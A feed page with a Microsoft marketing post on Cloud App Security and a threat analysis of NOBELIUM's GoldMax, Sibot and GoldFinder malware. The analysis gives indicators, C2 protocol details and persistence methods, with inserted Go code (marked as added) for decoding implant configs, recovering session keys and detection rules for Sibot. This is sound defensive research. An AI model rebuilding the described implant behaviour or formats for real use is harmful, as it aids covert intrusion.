A better cloud access security broker: Securing your SaaS cloud apps and services with Microsoft Cloud App Security

Microsoft Malware Protection Center - Thu, 03/04/2021 - 12:00pm

Today’s business uses an average of 1,180 cloud apps¹, with many of those organizations securing their apps through cloud access security brokers (CASB). The organizational need for a CASB has grown alongside the use of cloud apps to enable remote work and greater user productivity. When security responsibilities for cloud apps are shared between you and the cloud application or cloud provider, there’s a chance that some key security practices may be overlooked.

Beyond the areas where your IT team or the platform provider are responsible for security, some SaaS apps and services may fall into an unprotected gray zone. According to the shared responsibility model, IT teams are responsible for securing their organizations’ identity and access management (IAM), network resources, endpoints, devices, passwords, and more. But there’s currently not much clear guidance around SaaS Security Posture Management (SSPM). That’s where the right CASB can make the difference.

How the right CASB can help

A CASB is designed to analyze session traffic to and from the cloud, as well as highlight risks and block inappropriate access. With so many people now working remotely on personal devices, a CASB helps ensure that users accessing your cloud apps (having been properly authenticated by your identity provider) have the rights and permissions to use the selected app—provided it’s from an allowed device, and the session adheres to any other policy conditions defined by your organization.

To accomplish all this, a CASB usually provides these primary services: app discovery and management, secure access to all your apps, data protection, and threat protection. App discovery tells you which cloud apps the employees in your organization are accessing and helps you decide how to manage those apps. Data protection ensures that your people aren’t inappropriately accessing, using, or sharing sensitive data, and threat protection helps defend against inappropriate use of applications through malware, ransomware, or other threats.

For a large healthcare organization such as St. Luke’s, adopting Microsoft Cloud App Security enabled them to allow or block apps based on compliance with the Health Insurance Portability and Accountability Act (HIPAA) and reduce the possibility of leaked patient data.

“One of our challenges prior to deploying Cloud App Security was detecting shadow IT,” said Erin Boris, Information Security Strategic Specialist at SLUHN. “Gaining that visibility through Cloud App Security helps us with software inventory, app rationalization, and most importantly, data loss prevention.”  

Bridging the gap

SaaS Security Posture Management is a solution category that is part of the broader security posture management umbrella of features, specifically protecting SaaS products such as Office 365, Google Workspace, or Salesforce.

Gartner included SaaS Security Posture Management in the 2020 Gartner Hype Cycle for Cloud Security, defining SaaS Security Posture Management as “tools that continuously assess the security risk and manage the security posture of SaaS applications—offering suggestions for improved configuration to reduce risk.”

A CASB should help your team discover all SaaS apps within its purview, then determine which are shadow IT (a potential attack surface and a vector for malware). SaaS Security Posture Management takes it one step further to identify the abuse of these apps, identify misconfigurations, track configuration changes, and deploy automatic remediation to prevent data leakage and damage. SaaS Security Posture Management also covers SaaS storage, file sharing, and collaboration apps, which can be sources of data leakage.

The Microsoft Cloud App Security difference

Microsoft Cloud App Security helps secure all your cloud apps using sophisticated analytics to combat cyber threats across both cloud-native and on-premises apps and services, Microsoft and non-Microsoft alike. Recognized as a Leader in the Gartner Magic Quadrant for Cloud Access Security Brokers², Cloud App Security addresses these key features:

  • Shadow IT discovery: Discover and manage unauthorized access that can put your security at risk, through integration with Microsoft Defender for Endpoint or by leveraging your firewall and secure web gateway, and then choose to sanction or unsanction apps.
  • Information protection: Gain the power to enforce complex information and data loss prevention (DLP) policies across third-party apps through deep integration with Microsoft Information Protection, combined with the reverse proxy capabilities of Microsoft Cloud App Security.
  • Threat protection: Leverage the independent threat protection capabilities in MCAS, including our own UEBA capabilities as well as native integration with the Microsoft Defender suite (Microsoft Defender for Endpoint, Microsoft Defender for Office, and Microsoft Defender for Identity), to provide a unified view into devices, Office apps, and identities across on-premises and cloud resources. Monitor behaviors and block nefarious content.
  • Secure access: Connect with Azure Active Directory (Azure AD) to enforce and monitor access and session policies (such as leveraging conditional access from Azure Active Directory) across all managed cloud resources.
  • Security Posture Management: recommendations and security practices that help each organization deliberately define a standard of practice, and then receive and implement the guidance that helps them meet it.
    • CSPM: Cloud Security Posture Management provides multi-cloud security recommendations for the various workloads across IaaS such as AWS, GCP, and Azure.
    • SSPM: SaaS Security Posture Management helps secure multi-app environments and provides discovery for your SaaS apps, helping you identify misconfigurations, as well as track user activity and configuration changes, all to protect your data and to keep you compliant.

According to Forrester’s recent Total Economic Impact (TEI) study, Cloud App Security also helps customers save time and resources, delivering 151% ROI over three years with a payback period of less than three months. Other key findings include:

  • 80 percent reduction in time to monitor, assess, and govern cloud application portfolio risks.
  • 75 percent elimination of threats automatically due to increased visibility and automated threat protection.
  • 40 percent reduction in the likelihood of a data breach, with potential savings of more than $1.6 million over three years.
  • 90 percent reduction in hours required to audit cloud apps.

In all of your efforts to protect your cloud apps, Microsoft Cloud App Security delivers an easy and flexible solution with a basic investment of 15 hours to deploy. You’ll benefit from recommendations for your cloud security posture (based on Center for Internet Security standards), as well as suggestions on risk scoring for apps, connected information protection, labeling and encryption, and granular session controls from start to finish of every session. And Cloud App Security can grow incrementally, enabling the perfect balance between security for your organization and productivity for your users.

Learn more

For further information on how your organization can benefit from Microsoft Cloud App Security, connect with us at the links below:

Follow the Microsoft Cloud App Security Ninja blog and learn about Ninja Training.


To experience the benefits of full-featured CASB, sign up for a free trial—Microsoft Cloud App Security.

Follow us on LinkedIn at #CloudAppSecurity. To learn more about Microsoft Security solutions visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity on Twitter, and Microsoft Security on LinkedIn for the latest news and updates on cybersecurity.

¹Netskope report, 2018

²Gartner Magic Quadrant for Cloud Access Security Brokers, Craig Lawson, Steve Riley, October 28, 2020.

The Gartner document is available upon request from Microsoft.

Gartner does not endorse any vendor, product, or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.


GoldMax, GoldFinder, and Sibot: Analyzing NOBELIUM’s layered persistence

Microsoft Malware Protection Center - Thu, 03/04/2021 - 12:00pm

Microsoft continues to work with partners and customers to expand our knowledge of the threat actor behind the nation-state cyberattacks that compromised the supply chain of SolarWinds and impacted multiple other organizations. As we have shared previously, we have observed the threat actor using both backdoor and other malware implants to establish sustained access to affected networks. As part of our commitment to transparency and intelligence-sharing in the defender community, we continue to update analysis and investigative resources as we discover new tactics and techniques used by the threat actor.

Introducing NOBELIUM

Microsoft Threat Intelligence Center (MSTIC) is naming the actor behind the attacks against SolarWinds, the SUNBURST backdoor, TEARDROP malware, and related components as NOBELIUM.

Recent investigations have identified three new pieces of malware being used in late-stage activity by NOBELIUM. This blog provides detailed analysis of these malware strains to help defenders detect, protect, and respond to this threat. We continue to partner with FireEye to understand these threats and protect our mutual customers. FireEye’s analysis of the malware used by NOBELIUM is here.

Microsoft discovered these new attacker tools and capabilities in some compromised customer networks and observed them to be in use from August to September 2020. Further analysis has revealed these may have been on compromised systems as early as June 2020. These tools are new pieces of malware that are unique to this actor. They are tailor-made for specific networks and are assessed to be introduced after the actor has gained access through compromised credentials or the SolarWinds binary and after moving laterally with TEARDROP and other hands-on-keyboard actions.

These capabilities differ from previously known NOBELIUM tools and attack patterns, and reiterate the actor’s sophistication. In all stages of the attack, the actor demonstrated a deep knowledge of software tools, deployments, security software and systems common in networks, and techniques frequently used by incident response teams. This knowledge is reflected in the actor’s operational decisions, from the choice of command-and-control (C2) infrastructure to the naming of scheduled tasks used to maintain persistence.

With this actor’s established pattern of using unique infrastructure and tooling for each target, and the operational value of maintaining their persistence on compromised networks, it is likely that additional components will be discovered as our investigation into the actions of this threat actor continues.

New NOBELIUM malware

Maintaining persistence is critical for any threat actor after gaining access to a network. In addition to the backdoor in the SolarWinds software, NOBELIUM has been observed using stolen credentials to access cloud services like email and storage, as well as compromised identities to gain and maintain access to networks via virtual private networks (VPNs) and remote access tools. Microsoft assesses that the newly surfaced pieces of malware were used by the actor to maintain persistence and perform actions on very specific and targeted networks post-compromise, even evading initial detection during incident response.

GoldMax

The GoldMax malware was discovered persisting on networks as a scheduled task impersonating systems management software. In the instances it was encountered, the scheduled task was named after software that existed in the environment, and pointed to a subfolder in ProgramData named after that software, with a similar executable name. The executable, however, was the GoldMax implant.

Written in Go, GoldMax acts as command-and-control backdoor for the actor. It uses several different techniques to obfuscate its actions and evade detection. The malware writes an encrypted configuration file to disk, where the file name and AES-256 cipher keys are unique per implant and based on environmental variables and information about the network where it is running.

GoldMax establishes a secure session key with its C2 and uses that key to securely communicate with the C2, preventing non-GoldMax-initiated connections from receiving and identifying malicious traffic. The C2 can send commands to be launched for various operations, including native OS commands, via pseudo-randomly generated cookies. The hardcoded cookies are unique to each implant, appearing to be random strings but mapping to victims and operations on the actor side.

Observed GoldMax C2 domains are high-reputation and high-prevalence, often acquired from domain resellers so that Whois records retain the creation date from their previous registration, or domains that may have been compromised. This tactic complements NOBELIUM’s operational security strategy as these domains are more likely to be overlooked by security products and analysts based on their perceived long-lived domain ownership. Put simply, several domains we have shared as GoldMax C2 domains are only associated with NOBELIUM after the time they were re-sold or compromised – and Microsoft has provided that indicator context where it is available to us.

Upon execution, GoldMax retrieves a list of the system’s network interfaces; the malware terminates if it is unable to do so or no network interface is configured. It then attempts to determine if any of the network interfaces has the following hardcoded MAC address: c8:27:cc:c2:37:5a. If so, it terminates.

Figure 1. HardwareAddr.String() call, hardcoded MAC address, and os.Exit() call

Configuration file

GoldMax is designed to store its configuration data in an encrypted file named features.dat.tmp. The file name varies in different versions of GoldMax, but in all observed variants, the configuration file carries a .tmp file extension and is located in the same directory as GoldMax. The first time GoldMax is run, it uses a set of embedded default values to create and populate its configuration file on disk. The next time GoldMax runs, instead of using its embedded configuration data, it loads the configuration data from its configuration file stored on the file system.

The data from the configuration file typically matches the default configuration data embedded in GoldMax, since the embedded data was initially used to create the configuration file. However, GoldMax comes with a command-and-control feature that allows its operators to dynamically update its configuration data on the fly. When this happens, GoldMax overwrites the existing data in its configuration file with the new configuration data received from its operators, so the next time GoldMax is run, it uses the most up-to-date version of its configuration data to initialize its runtime settings.

The configuration data is encrypted using the AES-256 encryption algorithm, CFB encryption mode, and the following cipher key: 4naehrkz5alao2jd035zjh3j1v1dvyyc (key varies in different versions of GoldMax). The AES encrypted configuration data is then Base64-encoded using the custom Base64 alphabet “ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_” before it is stored in the configuration file on the file system. When run, GoldMax decodes (Base64) and decrypts (AES-256) the configuration data to reveal a custom data structure comprised of the following dynamically generated and hardcoded values (delimited by ‘|’):

Figure 2. Data structure of the GoldMax configuration data

GoldMax proceeds to parse the data structure depicted above and uses the values within to initialize its runtime settings and variables used by its different components.

If the configuration file is not present on the system (i.e., the first time it runs), GoldMax uses dynamically generated and embedded values to create and populate the data structure depicted above. It then uses the same AES encryption methodology to encrypt the data structure. After encrypting the data structure, GoldMax proceeds to Base64 encode the encrypted data structure and removes all instances of ‘=’ from the Base64 encoded string. It then creates a configuration file on the file system (e.g., features.dat.tmp) and stores the Base64 encoded data in the configuration file.

Activation date

GoldMax’s configuration data contains an execution activation/trigger date, stored as an ASCII Unix/Epoch time value as shown in the configuration data section above, that is essentially meant to function as an “activate after x date/time” feature. After loading its configuration data, GoldMax checks the current date-time value of the compromised system against the activation date from the configuration data.

Figure 3. Inline Unix() function and EPOCH comparison of the current and activation date/time

If an activation date-time value is specified in the configuration data (i.e., not set to ‘0’) and the activation date-time occurs on or before the current date-time of the compromised system, GoldMax commences its malicious activities. Otherwise, GoldMax terminates and continues to do so until the activation date is reached. If no activation date is specified in the configuration data (i.e., field set to ‘0’), the malware commences its malicious activities straightaway.

In all versions of GoldMax analyzed during our investigation, the activation date is initially set to ‘0’. However, through its command-and-control feature, the operators can dynamically update the activation date using a specific C2 command, in which case the new activation date is stored in the configuration file and is checked each time GoldMax runs.
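As an added example (not GoldMax's own code, and not from the original post), the following Go program reverses the on-disk configuration format described in the two sections above so an analyst can read a recovered .tmp file: custom-alphabet Base64 with the '=' padding stripped, then AES-256-CFB, then a '|'-delimited record, followed by the activation-date rule. The field order and the placement of the CFB IV (assumed to be the first 16 bytes of the ciphertext) are assumptions, because the figure showing the record layout is not reproduced in the text; the cipher key is the one quoted for the analyzed sample.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"encoding/base64"
	"errors"
	"fmt"
	"io"
	"strconv"
	"strings"
)

// Custom Base64 alphabet quoted in the analysis. GoldMax strips every '='
// from the stored string, so the decoder must accept unpadded input.
const goldMaxAlphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_"

var goldMaxB64 = base64.NewEncoding(goldMaxAlphabet).WithPadding(base64.NoPadding)

// Cipher key quoted in the analysis for one sample (32 bytes, i.e. AES-256).
// Other samples embed a different key.
const sampleKey = "4naehrkz5alao2jd035zjh3j1v1dvyyc"

// DecodeConfig reverses the on-disk form: custom Base64 without padding, then
// AES-256 in CFB mode, then a '|'-delimited record. ASSUMPTION: the 16-byte
// CFB IV is stored as the first block of the ciphertext; the analysis does not
// say how the IV is handled, so adjust this if a sample shows otherwise.
func DecodeConfig(stored string, key []byte) ([]string, error) {
	if len(key) != 32 {
		return nil, errors.New("AES-256 needs a 32-byte key")
	}
	raw, err := goldMaxB64.DecodeString(strings.TrimSpace(stored))
	if err != nil {
		return nil, fmt.Errorf("custom base64: %w", err)
	}
	if len(raw) < aes.BlockSize {
		return nil, errors.New("ciphertext shorter than one AES block")
	}
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	iv, ct := raw[:aes.BlockSize], raw[aes.BlockSize:]
	pt := make([]byte, len(ct))
	cipher.NewCFBDecrypter(block, iv).XORKeyStream(pt, ct)
	return strings.Split(string(pt), "|"), nil
}

// EncodeConfig builds the same on-disk form from a field list, so the decoder
// can be exercised offline against constructed data (same IV assumption).
func EncodeConfig(fields []string, key []byte) (string, error) {
	if len(key) != 32 {
		return "", errors.New("AES-256 needs a 32-byte key")
	}
	block, err := aes.NewCipher(key)
	if err != nil {
		return "", err
	}
	pt := []byte(strings.Join(fields, "|"))
	out := make([]byte, aes.BlockSize+len(pt))
	if _, err := io.ReadFull(rand.Reader, out[:aes.BlockSize]); err != nil {
		return "", err
	}
	cipher.NewCFBEncrypter(block, out[:aes.BlockSize]).XORKeyStream(out[aes.BlockSize:], pt)
	// NoPadding already omits '=', matching what GoldMax writes to disk.
	return goldMaxB64.EncodeToString(out), nil
}

// ActivationReached applies the activation-date rule from the analysis: a
// field of "0" means run immediately; otherwise the implant proceeds only once
// the stored Unix time is on or before the host's current time.
func ActivationReached(field string, nowUnix int64) (bool, error) {
	if field == "0" {
		return true, nil
	}
	at, err := strconv.ParseInt(field, 10, 64)
	if err != nil {
		return false, fmt.Errorf("activation field %q is not a Unix time: %w", field, err)
	}
	return at <= nowUnix, nil
}

func main() {
	// Constructed record; the real field order is an assumption (see above).
	fields := []string{"0", "1", "https://c2.example.invalid/", "Mozilla/5.0 (constructed)", "1-4"}
	stored, err := EncodeConfig(fields, []byte(sampleKey))
	if err != nil {
		panic(err)
	}
	got, err := DecodeConfig(stored, []byte(sampleKey))
	if err != nil {
		panic(err)
	}
	fmt.Printf("stored: %s\nfields: %q\n", stored, got)
}
```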

Decoy network traffic

GoldMax is equipped with a decoy network traffic generation feature that allows it to surround its malicious network traffic with seemingly benign traffic. This feature is meant to make distinguishing between malicious and benign traffic more challenging. If the decoy network traffic feature is enabled (set to ‘1’ in the configuration data), GoldMax issues a pseudo-random number of decoy HTTP GET requests (up to four) for URLs pointing to a mixture of legitimate and C2 domain names and/or IP addresses. The exact URL for each request is pseudo-randomly selected from a list of 14 hardcoded URLs. An example URL list comprised of 14 legitimate and C2 URLs is shown below:

Figure 4. Hardcoded URLs from which GoldMax selects up to four to issue HTTP requests for

As shown above, some of the decoy URLs point to the domain name of the actual C2 (e.g., onetechcompany[.]com). However, the particular HTTP resources referenced in the URLs above (e.g., style.css, script.js, icon.ico, etc.) are known to the C2 as being decoy resources that serve no role in the regular C2 communication between GoldMax and its C2.

The Referer value for each decoy HTTP request is also pseudo-randomly selected from a list of four legitimate domain names. For example, we have seen the following in various combinations to make up lists of four domains: www[.]mail[.]com, www[.]bing[.]com, www[.]facebook[.]com, www[.]google[.]com, www[.]twitter[.]com, www[.]yahoo[.]com, etc. For demonstration purposes, an example decoy HTTP GET request is included below (the Connection and User-Agent HTTP headers and their values are manually added to each request by GoldMax and remain the same across all decoy HTTP requests, regardless of the destination URL):

Figure 5. Sample decoy HTTP GET request

RSA session key

The next step in the execution cycle involves establishing a secure session key between GoldMax and its C2 server. GoldMax first requests a session key from its C2 server by sending an HTTP GET request that contains a custom HTTP Cookie value that is unique to each implant. The Cookie value is comprised of the following dynamically generated and hardcoded values:

Figure 6. HTTP Cookie value in HTTP GET request

An example request containing the custom Cookie value is shown below:

Figure 7. Sample HTTP GET request with the custom Cookie value

The User-Agent and Connection values above are hardcoded in the HTTP request. The Referer value is pseudo-randomly selected from a list of four legitimate domain names using various combinations of the following: www[.]mail[.]com, www[.]bing[.]com, www[.]facebook[.]com, www[.]google[.]com, www[.]twitter[.]com, www[.]yahoo[.]com, etc.

In response to the request above, GoldMax expects to receive an HTTP 200 response containing a very specific and hardcoded ASCII string (e.g., “uFLa12nFmKkjrmjj”). The seemingly random-looking string is typically 10-16 bytes long (after all leading and trailing white space has been removed). It can best be described as a “shared secret” between the C2 and each individual implant (the string varies in different versions of GoldMax). It serves as an acknowledgement that the C2 server has received GoldMax’s request for a new session key. If GoldMax does not receive the expected string, it sleeps for a random amount of time and repeats (indefinitely) the process described above to obtain the expected string from its C2 server, or until the GoldMax process is terminated.

After receiving the expected string, GoldMax sleeps for up to 14 seconds before proceeding. If the decoy traffic option is enabled in the configuration data, GoldMax issues a pseudo-random number of HTTP GET requests (as described under the decoy network traffic section above). GoldMax then issues a new HTTP GET request to its C2 server containing a new set of hardcoded Cookie values.

Figure 8. Sample HTTP GET request showing hardcoded Cookie values

The only observed difference between the first and second HTTP GET requests is the value of the second Cookie highlighted above (example values: iC0Pf2a48 from the first request vs. J4yeUYKyeuNa2 from the second request above). In response to the request, GoldMax receives an encrypted RSA session key (Base64-encoded). Each version of GoldMax contains an RSA private key which GoldMax proceeds to decode (using pem.Decode()) and parse (using x509.ParsePKCS1PrivateKey()). GoldMax uses rsa.DecryptOAEP() with the parsed private key to decrypt (using RSA-OAEP) the RSA-encrypted session key received from its C2 server. From this point on, the session key is used to encrypt data sent between GoldMax and its C2 server.
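An added example, not from the original post and not NOBELIUM's code: the recovery path an analyst would use with the PKCS#1 private key carved from a GoldMax sample and the Base64 body of the second C2 response, built on the same three calls the analysis names (pem.Decode, x509.ParsePKCS1PrivateKey, rsa.DecryptOAEP). The OAEP hash (SHA-256, no label) and the use of standard Base64 for the response are assumptions; the key pair and C2 reply are generated locally so the code runs offline.

```go
package main

import (
	"crypto/rand"
	"crypto/rsa"
	"crypto/sha256"
	"crypto/x509"
	"encoding/base64"
	"encoding/pem"
	"errors"
	"fmt"
	"strings"
)

// RecoverSessionKey turns a carved PKCS#1 PEM private key plus the Base64 C2
// response into the AES session key that protects later C2 commands.
// ASSUMPTIONS: standard Base64; OAEP with SHA-256 and an empty label. If a
// sample uses another hash, rsa.DecryptOAEP fails and the hash must be varied.
func RecoverSessionKey(privPEM []byte, b64Response string) ([]byte, error) {
	blk, _ := pem.Decode(privPEM)
	if blk == nil {
		return nil, errors.New("no PEM block found in carved key")
	}
	priv, err := x509.ParsePKCS1PrivateKey(blk.Bytes)
	if err != nil {
		return nil, fmt.Errorf("PKCS#1 parse: %w", err)
	}
	ct, err := base64.StdEncoding.DecodeString(strings.TrimSpace(b64Response))
	if err != nil {
		return nil, fmt.Errorf("base64: %w", err)
	}
	key, err := rsa.DecryptOAEP(sha256.New(), rand.Reader, priv, ct, nil)
	if err != nil {
		return nil, fmt.Errorf("RSA-OAEP: %w", err)
	}
	return key, nil
}

// NewKeyPEM makes a throwaway key pair in the PKCS#1 PEM form the implant
// embeds, standing in for a key carved from a sample.
func NewKeyPEM() ([]byte, *rsa.PublicKey, error) {
	priv, err := rsa.GenerateKey(rand.Reader, 2048)
	if err != nil {
		return nil, nil, err
	}
	p := pem.EncodeToMemory(&pem.Block{Type: "RSA PRIVATE KEY", Bytes: x509.MarshalPKCS1PrivateKey(priv)})
	return p, &priv.PublicKey, nil
}

// SimulateC2Response constructs the server side of the exchange for testing:
// the session key wrapped with RSA-OAEP under the implant's public key, then
// Base64-encoded, as the analysis describes the reply.
func SimulateC2Response(pub *rsa.PublicKey, sessionKey []byte) (string, error) {
	ct, err := rsa.EncryptOAEP(sha256.New(), rand.Reader, pub, sessionKey, nil)
	if err != nil {
		return "", err
	}
	return base64.StdEncoding.EncodeToString(ct), nil
}

func main() {
	privPEM, pub, err := NewKeyPEM()
	if err != nil {
		panic(err)
	}
	// Constructed 32-byte session key (AES-256), as the C2 would issue.
	want := []byte("constructed-session-key-32-bytes")
	resp, err := SimulateC2Response(pub, want)
	if err != nil {
		panic(err)
	}
	got, err := RecoverSessionKey(privPEM, resp)
	if err != nil {
		panic(err)
	}
	fmt.Printf("recovered session key: %q\n", got)
}
```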

C2 commands

After establishing a session key, GoldMax reaches out to its C2 server to receive, decrypt (AES-256), parse, and execute commands. To retrieve an encrypted C2 command from its C2 server, GoldMax sends an HTTP GET request. This HTTP GET request only contains a single Cookie value, which matches the Cookie value used during the session key establishment process (the User-Agent and Connection headers and values are hardcoded, as before):

Figure 9. Sample HTTP GET request containing a single Cookie value

In response to the request above, GoldMax receives an encrypted (AES-256) and encoded (Base64 using custom Base64 alphabet) C2 command. The command is encrypted using the session key established between GoldMax and its C2 server. After decoding and decrypting the C2 command, GoldMax proceeds to parse the C2 command.

C2 commands are represented as seemingly random alphanumerical ASCII strings (e.g., “KbwUQrcooAntqNMddu4XRj”) that are unique to each implant but known to the C2 server. The C2 commands allow the operator to download and execute files on the compromised system, upload files from the compromised system to the C2 server, execute OS commands on the compromised system, spawn a command shell, and dynamically update GoldMax’s configuration data. These dynamic updates to the GoldMax configuration data let the operator set a new activation date, replace the existing C2 URL and User-Agent values, enable or disable the decoy network traffic feature, and update the number range used by its PRNG.

It is worth noting that all observed versions of GoldMax were compiled with the Go compiler version 1.14.2 (released in April 2020). In all observed versions, the main Go source code file for GoldMax was located under the following directory: /var/www/html/builds/. The Go packages and libraries used during the compilation process of GoldMax were mostly located under the /var/www/html/go/src/ directory (e.g., /var/www/html/go/src/net/http/http.go).

Sibot

Sibot is a dual-purpose malware implemented in VBScript. It is designed to achieve persistence on the infected machine, then download and execute a payload from a remote C2 server. The VBScript file is given a name that impersonates legitimate Windows tasks and is either stored in the registry of the compromised system or in an obfuscated format on disk. The VBScript is then run via a scheduled task.

Sibot reaches out to a legitimate but compromised website to download a DLL to a folder under System32. In observed instances the DLL is downloaded to C:\windows\system32\drivers\, renamed with a .sys extension, and then executed by rundll32. The scheduled task calls an MSHTA application to run Sibot via the obfuscated script. This simplistic implementation allows for a low footprint for the actor, as they can download and run new code without changes to the compromised endpoint by just updating the hosted DLL. The compromised website used to host the DLL is different for every compromised network and includes websites of medical device manufacturers and IT service providers.

We have observed three variants of this malware, all of which are obfuscated:

  • Variant A is the simplest of the three. It only installs the second-stage script in the default registry value under the registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\sibot.
  • Variant B registers a scheduled task named Sibot and programmed to run daily. This task, which is saved by Windows in the file C:\Windows\System32\Tasks\Microsoft\Windows\WindowsUpdate\sibot, runs the following command-line daily:

The registry key referenced in this command-line contains the second-stage script.

  • Variant C is a standalone version of the second-stage script. However, while the second-stage script from Variant A is designed to be executed from the registry, this variant is designed to run from a file.

Figure 10. Sibot variants

The second-stage script

The purpose of the second-stage script is to download and run a payload from a remote server. The script can be customized with the following parameters:

  • Command-line with which to run the payload
  • Directory where the payload is installed
  • URL of the C2 server containing the payload to download
  • HTTP request to use for the download (e.g., GET)

When run, the first thing the script does is to retrieve a GUID associated with a LAN connection present on the machine by leveraging the interface offered by the WMI Class Root\Microsoft\Homenet\HNet_Connection. If a LAN connection is not available, the script defaults to a hardcoded GUID. This GUID is later communicated to the C2. It’s possible that the threat actor used this GUID to verify that the threat is running in a desirable environment, i.e., a real machine with LAN connections available. The next step of the second-stage script is to check if the machine is configured to use proxies, and if so, to get the address of a proxy. The script uses the StdRegProv WMI class to read the configuration data from the registry key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer and extract a valid proxy server.

At this point, the script establishes an HTTP connection to the C2 server. It sets the user-agent and the connection GUID as HTTP header variables, then sends the HTTP request. In both versions of the script, the request is GET. If the server response consists only of the same GUID that the malware sent, the script deletes itself. In the case of the second-stage script from Variant A, the script deletes the registry key where it is installed. In the case of Variant C, the script deletes the file from which it is running. If instead the server responds with any data other than the GUID, the second-stage script decrypts the data and saves it as a file. In both variants of the second-stage script, the payload is a DLL with a .SYS extension and saved in the %windir%\system32\drivers folder. Finally, the script uses the Win32_Process WMI class to execute the payload DLL via the rundll32.exe utility.

While the script is running in the context of a script host process (e.g., wscript.exe), the actions carried out through the WMI interface originate from the WMI host process (WmiPrvSe.exe). This effectively breaks the process chain between the action’s origin (the script host) and its execution (the WMI host), making it more difficult to trace events back to their true origin. Forensic analysis is also hindered by the lack of correlation between the execution of the second-stage script and the events it carries out via WMI.
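The Sibot behaviours described above (a DLL dropped under system32\drivers with a .sys extension and run through rundll32, the rundll32 child appearing under WmiPrvSE.exe rather than the script host, and the Variant A registry key) translate directly into triage rules. The following Go program is an added example, not part of the original post or of any Microsoft product; it runs those rules over a constructed batch of telemetry records whose field layout is invented for the example and is not a real EDR schema.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// Event is one constructed telemetry record. Process-creation records carry
// Parent/Image/CmdLine; registry records carry RegPath.
type Event struct {
	Kind    string // "process" or "registry"
	Parent  string
	Image   string
	CmdLine string
	RegPath string
}

// Finding names the rule that matched and the event that matched it.
type Finding struct {
	Rule  string
	Event Event
}

// A .sys path under system32\drivers handed to rundll32. Drivers are loaded
// by the kernel, never by rundll32, so a hit is rare and worth a look; the
// second-stage script stores its DLL exactly this way.
var sysUnderDrivers = regexp.MustCompile(`(?i)\\system32\\drivers\\[^\s,"]+\.sys\b`)

func isImage(e Event, name string) bool {
	return e.Kind == "process" && strings.EqualFold(e.Image, name)
}

func rundll32LoadsDriverFolderSys(e Event) bool {
	return isImage(e, "rundll32.exe") && sysUnderDrivers.MatchString(e.CmdLine)
}

// Sibot launches the payload through the Win32_Process WMI class, so the
// parent of rundll32 is the WMI host, not the script host (the broken chain
// described in the analysis).
func rundll32FromWmiHost(e Event) bool {
	return isImage(e, "rundll32.exe") && strings.EqualFold(e.Parent, "WmiPrvSE.exe")
}

// Variant A keeps its second stage in the default value of this key.
func sibotRegistryKey(e Event) bool {
	return e.Kind == "registry" &&
		strings.HasSuffix(strings.ToLower(e.RegPath), `\currentversion\sibot`)
}

var rules = []struct {
	Name  string
	Match func(Event) bool
}{
	{`rundll32 executes .sys from system32\drivers`, rundll32LoadsDriverFolderSys},
	{`rundll32 spawned by WmiPrvSE.exe`, rundll32FromWmiHost},
	{`write under CurrentVersion\sibot`, sibotRegistryKey},
}

// Triage returns every (rule, event) pair that matched, in input order then
// rule order. Hits are leads for an analyst, not blocking verdicts.
func Triage(events []Event) []Finding {
	var out []Finding
	for _, e := range events {
		for _, r := range rules {
			if r.Match(e) {
				out = append(out, Finding{r.Name, e})
			}
		}
	}
	return out
}

// SampleEvents is a constructed batch: records modelled on the analysis plus
// benign look-alikes (a drivers\etc path with no .sys, a normal rundll32 use)
// that must not fire.
func SampleEvents() []Event {
	return []Event{
		{Kind: "process", Parent: "WmiPrvSE.exe", Image: "rundll32.exe",
			CmdLine: `rundll32.exe C:\windows\system32\drivers\example.sys,Start`},
		{Kind: "process", Parent: "explorer.exe", Image: "rundll32.exe",
			CmdLine: `rundll32.exe shell32.dll,Control_RunDLL`},
		{Kind: "process", Parent: "svchost.exe", Image: "rundll32.exe",
			CmdLine: `rundll32.exe C:\Windows\System32\drivers\etc\hosts`},
		{Kind: "registry", RegPath: `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\sibot`},
		{Kind: "registry", RegPath: `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run`},
	}
}

func main() {
	for _, f := range Triage(SampleEvents()) {
		fmt.Printf("%-46s %s%s\n", f.Rule, f.Event.CmdLine, f.Event.RegPath)
	}
}
```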

GoldFinder

Another tool written in Go, GoldFinder was most likely used as a custom HTTP tracer tool that logs the route or hops that a packet takes to reach a hardcoded C2 server. When launched, the malware issues an HTTP request for a hardcoded IP address (e.g., hxxps://185[.]225[.]69[.]69/) and logs the HTTP response to a plaintext log file (e.g., loglog.txt created in the present working directory). GoldFinder uses the following hardcoded labels to store the request and response information in the log file:

  • Target: The C2 URL
  • StatusCode: HTTP response/status code
  • Headers: HTTP response headers and their values
  • Data: Data from the HTTP response received from the C2

An example log entry using a sample date is shown below:

Figure 11. Sample log entry

If the response is not an HTTP 200 (OK) response and contains an HTTP Location field (indicating a redirect), GoldFinder recursively follows and logs the redirects until it receives an HTTP 200 response, at which point it terminates. If a Location header is present in the response and the Location value starts with the string “http”, GoldFinder extracts the Location URL (i.e., redirect URL) and issues a new HTTP GET request for the redirect URL. It again logs the request and its response in the plaintext log file:

Figure 12. Sample log file

If GoldFinder receives an HTTP 200 status code in response to the request above, indicating no more redirects, it terminates. Otherwise, it recursively follows the redirect up to 99 times or until it receives an HTTP 200 response, whichever occurs first.

When launched, GoldFinder can identify all HTTP proxy servers and other redirectors such as network security devices that an HTTP request travels through inside and outside the network to reach the intended C2 server. When used on a compromised device, GoldFinder can be used to inform the actor of potential points of discovery or logging of their other actions, such as C2 communication with GoldMax.

